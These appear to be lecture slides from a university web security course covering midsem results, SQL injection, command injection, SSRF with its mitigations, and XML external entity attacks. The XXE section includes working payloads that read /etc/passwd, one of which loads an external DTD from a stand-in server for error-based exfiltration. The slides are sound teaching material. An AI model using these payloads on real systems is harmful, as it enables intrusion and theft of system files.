Week 5

Good Faith Policy

“These courses expects a high standard of professionalism from its students with regard to how security testing is conducted. We expect all students to act in good faith at all times […]”

TL;DR Don’t be mean

https://sec.edu.au/good-faith-policy

Midsem Review

How did(nt) the midsem go?

  • Q1 - HTML - 100%
  • Q1 - Header - 71%
  • Q1 - Robots - 51%
  • Q2 (Parameter Fixing) - 98%
  • Q3 (Source Auditing) - 48%
  • Q4 (Information Leak) - 54%
  • Q5 - IDOR - 43%
  • Q5 - SQLi / IDOR - 2%
  • Q5 - SQLi (supersecret) - 0%
  • Bonus (Instructions) - 93%
  • Secret Flag (midsem0) - 1%

Bonus Marks

(redemption)

 

Topic 2 challenge walkthroughs
Cool things?

Recent News

Atlassian go brrr

  • CSP error in one of the subdomains
Topic 3 Challenges

More Injection

SQLI

  • ORDER BY
  • GROUP BY
  • DISTINCT
  • LIMIT
  • OFFSET

Command Injection / RCE

Properly handle user input!

  • Remote Shell
  • Web Shell
  • SSTI

 

Let’s have a look at WebCMS4 again

SSRF

Think back to HaaS

  • Only access to kb from haas
  • We could send network requests that appeared to originate from the haas server
  • Corporate / internal network?

Main Idea

Utilise the outbound connection of a device to access/gain more information

  • Information retrieval
  • Information disclosure - i.e. cse login servers
  • Can lead to RCE
  • Server Side Includes

Make a server do something it’s not intended to

Mitigation

  • URL parsing is hard
  • Whitelist domains and IPs!
  • Lower the access control of services
  • Set limits! exec time, file sizes, recursion depth
  • Local devices should NOT be assumed to be safe

XXE (XML External Entity)

swisskyrepo/PayloadsAllTheThings

  • DTD - Document Type Definition
  • Internal Entity: If an entity is declared within a DTD
    • Kinda like variables
  • External Entity: If an entity is declared outside a DTD
    • i.e external resources, used as data feeds
e.g Internal Entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % mystr "wowowo" >
]> 
<data>
  <item>&mystr;</item>
</data>

wowowo
e.g. External Entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY number SYSTEM "http://randomNumberGenerator.com">
]> 
<data>
  <item>&number;</item>
</data>

7
e.g. Parameterised Entities
<!DOCTYPE foo [
  <!ENTITY % string "woah" >
  <!ENTITY % result "Got me like: %string;" >
]>

Got me like: woah
Exploit: LFI / SSI

Exploit the external entity to perform LFI / SSI

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
]> 
<data>
  <item>&passwdFile;</item>
</data>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

Exploit: Error-Based XXE

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://some.server/ext.dtd">
    %ext;
]>
<message></message>

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % A "<!ENTITY &#x25; B SYSTEM 'file:///lol/%file;'>">
%A;
%B;

Many more…

Deliverables

  • This topic’s challenges due next Monday 23:59pm
  • Report - Week 7

Enjoy your Week 6 break ~

Home